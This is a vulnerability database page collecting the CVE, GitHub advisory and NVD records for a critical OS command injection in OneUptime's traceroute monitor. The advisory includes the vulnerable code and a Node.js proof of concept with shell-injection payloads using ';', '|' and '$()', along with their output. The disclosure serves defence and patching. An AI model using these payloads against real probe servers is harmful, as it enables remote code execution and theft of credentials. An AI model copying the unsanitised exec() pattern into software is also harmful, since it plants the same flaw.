Vulnerability-Lookup

CVE-2026-27728 (GCVE-0-2026-27728)

Vulnerability from cvelistv5 – Published: 2026-02-25 16:25 – Updated: 2026-02-25 20:19

Title

OneUptime: OS Command Injection in Probe NetworkPathMonitor via unsanitized destination in traceroute exec()

Summary

OneUptime is a solution for monitoring and managing online services. Prior to version 10.0.7, an OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor's destination field. Version 10.0.7 fixes the vulnerability.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/OneUptime/oneuptime/security/a…	x_refsource_CONFIRM
	https://github.com/OneUptime/oneuptime/commit/f2c…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	OneUptime	oneuptime	Affected: < 10.0.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27728",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-25T20:19:45.771535Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-25T20:19:55.906Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "oneuptime",
          "vendor": "OneUptime",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 10.0.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OneUptime is a solution for monitoring and managing online services. Prior to version 10.0.7, an OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor\u0027s destination field. Version 10.0.7 fixes the vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-25T16:25:09.698Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5"
        },
        {
          "name": "https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1"
        }
      ],
      "source": {
        "advisory": "GHSA-jmhp-5558-qxh5",
        "discovery": "UNKNOWN"
      },
      "title": "OneUptime: OS Command Injection in Probe NetworkPathMonitor via unsanitized destination in traceroute exec()"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27728",
    "datePublished": "2026-02-25T16:25:09.698Z",
    "dateReserved": "2026-02-23T18:37:14.789Z",
    "dateUpdated": "2026-02-25T20:19:55.906Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-27728",
      "date": "2026-04-20",
      "epss": "0.00343",
      "percentile": "0.5699"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27728\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T17:25:40.103\",\"lastModified\":\"2026-03-02T18:56:30.610\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OneUptime is a solution for monitoring and managing online services. Prior to version 10.0.7, an OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor\u0027s destination field. Version 10.0.7 fixes the vulnerability.\"},{\"lang\":\"es\",\"value\":\"OneUptime es una soluci\u00f3n para monitorear y gestionar servicios en l\u00ednea. Antes de la versi\u00f3n 10.0.7, una vulnerabilidad de inyecci\u00f3n de comandos del sistema operativo en `NetworkPathMonitor.performTraceroute()` permite a cualquier usuario de proyecto autenticado ejecutar comandos arbitrarios del sistema operativo en el servidor Probe al inyectar metacaracteres de shell en el campo de destino de un monitor. La versi\u00f3n 10.0.7 corrige la vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"10.0.7\",\"matchCriteriaId\":\"6FD1CDBC-9031-428E-ABC5-1FED83248B5D\"}]}]}],\"references\":[{\"url\":\"https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

GHSA-JMHP-5558-QXH5

Vulnerability from github – Published: 2026-02-25 18:09 – Updated: 2026-02-27 20:55

Summary

OneUptime: OS Command Injection in Probe NetworkPathMonitor via unsanitized destination in traceroute exec()

Details

Summary

An OS command injection vulnerability in NetworkPathMonitor.performTraceroute() allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor's destination field.

Details

The vulnerability exists in Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts, lines 149–191.

The performTraceroute() method constructs a shell command by directly interpolating the user-controlled destination parameter into a string template, then executes it via child_process.exec() (wrapped through promisify):

// Line 13 — exec imported from child_process
import { exec } from "child_process";

// Line 15-17 — promisified into execAsync
const execAsync = promisify(exec);

// Lines 149-191 — destination is never sanitized
private static async performTraceroute(
    destination: string,  // ← attacker-controlled
    maxHops: number,
    timeout: number,
): Promise<TraceRoute> {
    // ...
    let command: string;
    if (isWindows) {
        command = `tracert -h ${maxHops} -w ${...} ${destination}`;
    } else if (isMac) {
        command = `traceroute -m ${maxHops} -w 3 ${destination}`;
    } else {
        command = `traceroute -m ${maxHops} -w 3 ${destination}`;
    }

    const tracePromise = execAsync(command);  // ← shell execution

The destination value originates from the public trace() method (line 31), which accepts URL | Hostname | IPv4 | IPv6 | string types. When a raw string is passed (line 47: hostAddress = destination), no validation or sanitization is performed before it reaches performTraceroute().

child_process.exec() spawns a shell (/bin/sh), so any shell metacharacters (;, |, $(), ` `, &&, ||, \n) in destination will be interpreted, allowing full command injection.

PoC

poc.cjs

/**
 * PoC: OS Command Injection in OneUptime NetworkPathMonitor
 *
 * Replicates the exact vulnerable code path from
 * Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts:149-191
 */

const { exec } = require("child_process");
const { promisify } = require("util");
const execAsync = promisify(exec);

async function performTraceroute_VULNERABLE(destination, maxHops, timeout) {
    const isMac = process.platform === "darwin";
    const isWindows = process.platform === "win32";

    let command;
    if (isWindows) {
        command = `tracert -h ${maxHops} -w ${Math.ceil(timeout / 1000) * 1000} ${destination}`;
    } else if (isMac) {
        command = `traceroute -m ${maxHops} -w 3 ${destination}`;
    } else {
        command = `traceroute -m ${maxHops} -w 3 ${destination}`;
    }

    console.log(`[VULN] Constructed command: ${command}`);

    try {
        const { stdout, stderr } = await execAsync(command);
        return { stdout, stderr };
    } catch (err) {
        return { stdout: err.stdout || "", stderr: err.stderr || err.message };
    }
}

async function runPoC() {
    console.log("=== Payload 1: Semicolon chaining (;) ===");
    console.log("  destination = '127.0.0.1; id'\n");
    const r1 = await performTraceroute_VULNERABLE("127.0.0.1; id", 1, 5000);
    console.log("[stdout]:", r1.stdout);

    console.log("\n=== Payload 2: Pipe injection (|) ===");
    console.log("  destination = '127.0.0.1 | whoami'\n");
    const r2 = await performTraceroute_VULNERABLE("127.0.0.1 | whoami", 1, 5000);
    console.log("[stdout]:", r2.stdout);

    console.log("\n=== Payload 3: Subshell execution $() ===");
    console.log("  destination = '127.0.0.1$(echo INJECTED)'\n");
    const r3 = await performTraceroute_VULNERABLE("127.0.0.1$(echo INJECTED)", 1, 5000);
    console.log("[stderr]:", r3.stderr);
}

runPoC().catch(console.error);

Run the PoC:

node poc.cjs

Expected output (confirmed on macOS with Node.js v25.2.1):

=== Payload 1: Semicolon chaining (;) ===
  destination = '127.0.0.1; id'

[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1; id
[stdout]:  1  localhost (127.0.0.1)  0.215 ms  0.076 ms  0.055 ms
uid=501(dxleryt) gid=20(staff) groups=20(staff),12(everyone)...

=== Payload 2: Pipe injection (|) ===
  destination = '127.0.0.1 | whoami'

[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1 | whoami
[stdout]: dxleryt

=== Payload 3: Subshell execution $() ===
  destination = '127.0.0.1$(echo INJECTED)'

[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1$(echo INJECTED)
[stderr]: traceroute: unknown host 127.0.0.1INJECTED

The id and whoami commands execute successfully, proving arbitrary command execution. The subshell payload proves inline shell evaluation — $(echo INJECTED) is evaluated and appended to the hostname.

Impact

Vulnerability type: OS Command Injection (CWE-78)

Who is impacted: Any authenticated user with the ability to create or edit a network path monitor in a OneUptime project can execute arbitrary operating system commands on the Probe server(s). In a multi-tenant SaaS deployment, this allows a malicious tenant to:

Execute arbitrary commands as the Probe service user (Remote Code Execution)
Read sensitive files from the Probe server (e.g., environment variables, credentials, service account tokens)
Pivot to internal services accessible from the Probe's network position
Compromise other tenants' monitoring data if Probes are shared across tenants
Establish persistent backdoors (reverse shells, cron jobs, SSH keys)

Note: The NetworkPathMonitor class is fully implemented and exported but not yet wired into the monitor execution pipeline (no callers import it). The vulnerability will become exploitable once this monitor type is integrated. The code is present in the current codebase and ready to be activated.

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oneuptime/common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27728"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:09:47Z",
    "nvd_published_at": "2026-02-25T17:25:40Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nAn OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor\u0027s destination field.\n\n## Details\n\nThe vulnerability exists in [`Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts`](Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts), lines 149\u2013191.\n\nThe `performTraceroute()` method constructs a shell command by directly interpolating the user-controlled `destination` parameter into a string template, then executes it via `child_process.exec()` (wrapped through `promisify`):\n\n```typescript\n// Line 13 \u2014 exec imported from child_process\nimport { exec } from \"child_process\";\n\n// Line 15-17 \u2014 promisified into execAsync\nconst execAsync = promisify(exec);\n\n// Lines 149-191 \u2014 destination is never sanitized\nprivate static async performTraceroute(\n    destination: string,  // \u2190 attacker-controlled\n    maxHops: number,\n    timeout: number,\n): Promise\u003cTraceRoute\u003e {\n    // ...\n    let command: string;\n    if (isWindows) {\n        command = `tracert -h ${maxHops} -w ${...} ${destination}`;\n    } else if (isMac) {\n        command = `traceroute -m ${maxHops} -w 3 ${destination}`;\n    } else {\n        command = `traceroute -m ${maxHops} -w 3 ${destination}`;\n    }\n\n    const tracePromise = execAsync(command);  // \u2190 shell execution\n```\n\nThe `destination` value originates from the public `trace()` method (line 31), which accepts `URL | Hostname | IPv4 | IPv6 | string` types. When a raw `string` is passed (line 47: `hostAddress = destination`), no validation or sanitization is performed before it reaches `performTraceroute()`.\n\n`child_process.exec()` spawns a shell (`/bin/sh`), so any shell metacharacters (`;`, `|`, `$()`, `` ` ` ``, `\u0026\u0026`, `||`, `\\n`) in `destination` will be interpreted, allowing full command injection.\n\n## PoC\n\n\n1. poc.cjs\n```javascript\n/**\n * PoC: OS Command Injection in OneUptime NetworkPathMonitor\n *\n * Replicates the exact vulnerable code path from\n * Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts:149-191\n */\n\nconst { exec } = require(\"child_process\");\nconst { promisify } = require(\"util\");\nconst execAsync = promisify(exec);\n\nasync function performTraceroute_VULNERABLE(destination, maxHops, timeout) {\n    const isMac = process.platform === \"darwin\";\n    const isWindows = process.platform === \"win32\";\n\n    let command;\n    if (isWindows) {\n        command = `tracert -h ${maxHops} -w ${Math.ceil(timeout / 1000) * 1000} ${destination}`;\n    } else if (isMac) {\n        command = `traceroute -m ${maxHops} -w 3 ${destination}`;\n    } else {\n        command = `traceroute -m ${maxHops} -w 3 ${destination}`;\n    }\n\n    console.log(`[VULN] Constructed command: ${command}`);\n\n    try {\n        const { stdout, stderr } = await execAsync(command);\n        return { stdout, stderr };\n    } catch (err) {\n        return { stdout: err.stdout || \"\", stderr: err.stderr || err.message };\n    }\n}\n\nasync function runPoC() {\n    console.log(\"=== Payload 1: Semicolon chaining (;) ===\");\n    console.log(\"  destination = \u0027127.0.0.1; id\u0027\\n\");\n    const r1 = await performTraceroute_VULNERABLE(\"127.0.0.1; id\", 1, 5000);\n    console.log(\"[stdout]:\", r1.stdout);\n\n    console.log(\"\\n=== Payload 2: Pipe injection (|) ===\");\n    console.log(\"  destination = \u0027127.0.0.1 | whoami\u0027\\n\");\n    const r2 = await performTraceroute_VULNERABLE(\"127.0.0.1 | whoami\", 1, 5000);\n    console.log(\"[stdout]:\", r2.stdout);\n\n    console.log(\"\\n=== Payload 3: Subshell execution $() ===\");\n    console.log(\"  destination = \u0027127.0.0.1$(echo INJECTED)\u0027\\n\");\n    const r3 = await performTraceroute_VULNERABLE(\"127.0.0.1$(echo INJECTED)\", 1, 5000);\n    console.log(\"[stderr]:\", r3.stderr);\n}\n\nrunPoC().catch(console.error);\n```\n\n2. Run the PoC:\n\n```bash\nnode poc.cjs\n```\n\n3. **Expected output** (confirmed on macOS with Node.js v25.2.1):\n\n```\n=== Payload 1: Semicolon chaining (;) ===\n  destination = \u0027127.0.0.1; id\u0027\n\n[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1; id\n[stdout]:  1  localhost (127.0.0.1)  0.215 ms  0.076 ms  0.055 ms\nuid=501(dxleryt) gid=20(staff) groups=20(staff),12(everyone)...\n\n=== Payload 2: Pipe injection (|) ===\n  destination = \u0027127.0.0.1 | whoami\u0027\n\n[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1 | whoami\n[stdout]: dxleryt\n\n=== Payload 3: Subshell execution $() ===\n  destination = \u0027127.0.0.1$(echo INJECTED)\u0027\n\n[VULN] Constructed command: traceroute -m 1 -w 3 127.0.0.1$(echo INJECTED)\n[stderr]: traceroute: unknown host 127.0.0.1INJECTED\n```\n\nThe `id` and `whoami` commands execute successfully, proving arbitrary command execution. The subshell payload proves inline shell evaluation \u2014 `$(echo INJECTED)` is evaluated and appended to the hostname.\n\n## Impact\n\n**Vulnerability type:** OS Command Injection (CWE-78)\n\n**Who is impacted:** Any authenticated user with the ability to create or edit a network path monitor in a OneUptime project can execute arbitrary operating system commands on the Probe server(s). In a multi-tenant SaaS deployment, this allows a malicious tenant to:\n\n- **Execute arbitrary commands** as the Probe service user (Remote Code Execution)\n- **Read sensitive files** from the Probe server (e.g., environment variables, credentials, service account tokens)\n- **Pivot to internal services** accessible from the Probe\u0027s network position\n- **Compromise other tenants\u0027 monitoring data** if Probes are shared across tenants\n- **Establish persistent backdoors** (reverse shells, cron jobs, SSH keys)\n\n\u003e **Note:** The `NetworkPathMonitor` class is fully implemented and exported but not yet wired into the monitor execution pipeline (no callers import it). The vulnerability will become exploitable once this monitor type is integrated. The code is present in the current codebase and ready to be activated.",
  "id": "GHSA-jmhp-5558-qxh5",
  "modified": "2026-02-27T20:55:31Z",
  "published": "2026-02-25T18:09:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27728"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime: OS Command Injection in Probe NetworkPathMonitor via unsanitized destination in traceroute exec()"
}

FKIE_CVE-2026-27728

Vulnerability from fkie_nvd - Published: 2026-02-25 17:25 - Updated: 2026-03-02 18:56

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1	Patch
	security-advisories@github.com	https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	hackerbay	oneuptime	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6FD1CDBC-9031-428E-ABC5-1FED83248B5D",
              "versionEndExcluding": "10.0.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OneUptime is a solution for monitoring and managing online services. Prior to version 10.0.7, an OS command injection vulnerability in `NetworkPathMonitor.performTraceroute()` allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor\u0027s destination field. Version 10.0.7 fixes the vulnerability."
    },
    {
      "lang": "es",
      "value": "OneUptime es una soluci\u00f3n para monitorear y gestionar servicios en l\u00ednea. Antes de la versi\u00f3n 10.0.7, una vulnerabilidad de inyecci\u00f3n de comandos del sistema operativo en `NetworkPathMonitor.performTraceroute()` permite a cualquier usuario de proyecto autenticado ejecutar comandos arbitrarios del sistema operativo en el servidor Probe al inyectar metacaracteres de shell en el campo de destino de un monitor. La versi\u00f3n 10.0.7 corrige la vulnerabilidad."
    }
  ],
  "id": "CVE-2026-27728",
  "lastModified": "2026-03-02T18:56:30.610",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-02-25T17:25:40.103",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/OneUptime/oneuptime/commit/f2cce35a04fac756cecc7a4c55e23758b99288c1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jmhp-5558-qxh5"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27728 (GCVE-0-2026-27728)

GHSA-JMHP-5558-QXH5

Summary

Details

PoC

Impact

FKIE_CVE-2026-27728

Tags

Sightings

Nomenclature